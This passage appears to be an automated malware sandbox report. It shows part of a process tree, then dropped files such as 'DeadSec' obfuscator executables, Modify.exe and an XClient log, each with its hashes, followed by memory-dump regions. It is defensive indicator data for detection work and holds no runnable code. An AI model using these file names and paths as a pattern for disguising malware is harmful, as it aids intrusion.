                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                    1⤵
                                                                                                                      PID:1448
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                      1⤵
                                                                                                                        PID:852
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                        1⤵
                                                                                                                          PID:3468
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                          1⤵
                                                                                                                            PID:2560
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                            1⤵
                                                                                                                              PID:4972

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

                                                                                                                              Filesize

                                                                                                                              164KB

                                                                                                                              MD5

                                                                                                                              22d120454dd38d7f1a3f1cd0eb497f95

                                                                                                                              SHA1

                                                                                                                              4c11a082bf8e64b21310b959821a9f7324aa8107

                                                                                                                              SHA256

                                                                                                                              6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

                                                                                                                              SHA512

                                                                                                                              1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

                                                                                                                              Filesize

                                                                                                                              654B

                                                                                                                              MD5

                                                                                                                              2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                              SHA1

                                                                                                                              684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                              SHA256

                                                                                                                              e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                              SHA512

                                                                                                                              1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                              SHA1

                                                                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                              SHA256

                                                                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                              SHA512

                                                                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              d3235ed022a42ec4338123ab87144afa

                                                                                                                              SHA1

                                                                                                                              5058608bc0deb720a585a2304a8f7cf63a50a315

                                                                                                                              SHA256

                                                                                                                              10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

                                                                                                                              SHA512

                                                                                                                              236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              d335b933fd5902cc5d6e6f5cfae33b57

                                                                                                                              SHA1

                                                                                                                              30511e75e9f4d4b09ddbeb2b6adeb5cd89defd87

                                                                                                                              SHA256

                                                                                                                              c1e38b772837438d10218009be55d7b2098daa5ba708708836f56a7e99024dc1

                                                                                                                              SHA512

                                                                                                                              4839b6be9877bb1a64d387df0f93b40859e48a5b6e7d2fb5fd92a057b1973916b93727b4dca9f1819038da65fd4548afb7f0c414a82e388e714dde6e6ccb4266

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              9a0c0a8d1f8f450b3623a60721b4eb28

                                                                                                                              SHA1

                                                                                                                              462bf53afba0d96f3c5a528e8a5f9e3d40083b24

                                                                                                                              SHA256

                                                                                                                              e81c53eaaee036b0a54daf828e5268973ff71477c84f9248ed904f4d6cd92902

                                                                                                                              SHA512

                                                                                                                              82848da2dc54602d048958819b5083582cecee502f33656706e708c168a0abc854e1e9b57865e754f41d678ec662ac681ef61b4dfd8ca255f48bc9bc1aeea818

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              15dde0683cd1ca19785d7262f554ba93

                                                                                                                              SHA1

                                                                                                                              d039c577e438546d10ac64837b05da480d06bf69

                                                                                                                              SHA256

                                                                                                                              d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                                                              SHA512

                                                                                                                              57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              ce4540390cc4841c8973eb5a3e9f4f7d

                                                                                                                              SHA1

                                                                                                                              2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

                                                                                                                              SHA256

                                                                                                                              e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

                                                                                                                              SHA512

                                                                                                                              2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              2979eabc783eaca50de7be23dd4eafcf

                                                                                                                              SHA1

                                                                                                                              d709ce5f3a06b7958a67e20870bfd95b83cad2ea

                                                                                                                              SHA256

                                                                                                                              006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

                                                                                                                              SHA512

                                                                                                                              92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              10890cda4b6eab618e926c4118ab0647

                                                                                                                              SHA1

                                                                                                                              1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

                                                                                                                              SHA256

                                                                                                                              00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

                                                                                                                              SHA512

                                                                                                                              a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              948B

                                                                                                                              MD5

                                                                                                                              07d142044fb78e359c794180a9c6fdff

                                                                                                                              SHA1

                                                                                                                              8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e

                                                                                                                              SHA256

                                                                                                                              2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea

                                                                                                                              SHA512

                                                                                                                              356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Modify.exe

                                                                                                                              Filesize

                                                                                                                              229KB

                                                                                                                              MD5

                                                                                                                              9259d8aef8f52e8ff4fa082c0074c9b0

                                                                                                                              SHA1

                                                                                                                              88abb68a5632812be3c18e0c740e3818d9501b3e

                                                                                                                              SHA256

                                                                                                                              45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db

                                                                                                                              SHA512

                                                                                                                              9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5uioafcs.iy2.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

                                                                                                                              Filesize

                                                                                                                              42KB

                                                                                                                              MD5

                                                                                                                              737b2d60dc5d475685b65f5c288e00c0

                                                                                                                              SHA1

                                                                                                                              144ba7647d8609abe4aab74d4f191e2c594dd55a

                                                                                                                              SHA256

                                                                                                                              69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084

                                                                                                                              SHA512

                                                                                                                              96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

                                                                                                                            • memory/64-242-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/64-235-0x0000012258B60000-0x0000012258B8C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/64-241-0x0000012258B60000-0x0000012258B8C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/616-209-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/616-200-0x000001AC34140000-0x000001AC34166000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              152KB

                                                                                                                            • memory/616-208-0x000001AC34170000-0x000001AC3419C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/616-202-0x000001AC34170000-0x000001AC3419C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/616-201-0x000001AC34170000-0x000001AC3419C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/672-219-0x000001E58DB30000-0x000001E58DB5C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/672-213-0x000001E58DB30000-0x000001E58DB5C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/672-220-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/736-246-0x000001FB60540000-0x000001FB6056C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/952-230-0x00000218B1F00000-0x00000218B1F2C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/952-231-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/952-224-0x00000218B1F00000-0x00000218B1F2C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              176KB

                                                                                                                            • memory/972-36-0x000001BFC8560000-0x000001BFC8582000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/1700-1128-0x0000000000310000-0x0000000000320000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/2808-123-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2808-918-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2808-914-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2808-26-0x0000000000200000-0x0000000000210000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/2808-24-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3604-4-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3604-63-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3604-0-0x00007FFE83F43000-0x00007FFE83F45000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3604-1-0x00000000009C0000-0x0000000000A0A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              296KB

                                                                                                                            • memory/3612-1014-0x0000000000560000-0x0000000000570000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/3652-195-0x00007FFEA2150000-0x00007FFEA2345000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/3652-194-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3652-189-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3652-190-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3652-192-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3652-191-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3652-197-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3652-196-0x00007FFEA0940000-0x00007FFEA09FE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/3688-185-0x0000019248380000-0x00000192483AA000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              168KB

                                                                                                                            • memory/3688-186-0x00007FFEA2150000-0x00007FFEA2345000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/3688-188-0x00007FFEA0940000-0x00007FFEA09FE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/4260-127-0x000002736D9B0000-0x000002736D9C2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              72KB

                                                                                                                            • memory/4260-79-0x0000027354F60000-0x0000027354FB0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              320KB

                                                                                                                            • memory/4260-836-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4260-29-0x0000027353160000-0x00000273531A0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              256KB

                                                                                                                            • memory/4260-30-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4260-126-0x000002736D960000-0x000002736D96A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              40KB

                                                                                                                            • memory/4260-80-0x000002736D940000-0x000002736D95E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              120KB

                                                                                                                            • memory/4260-78-0x000002736D8C0000-0x000002736D936000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              472KB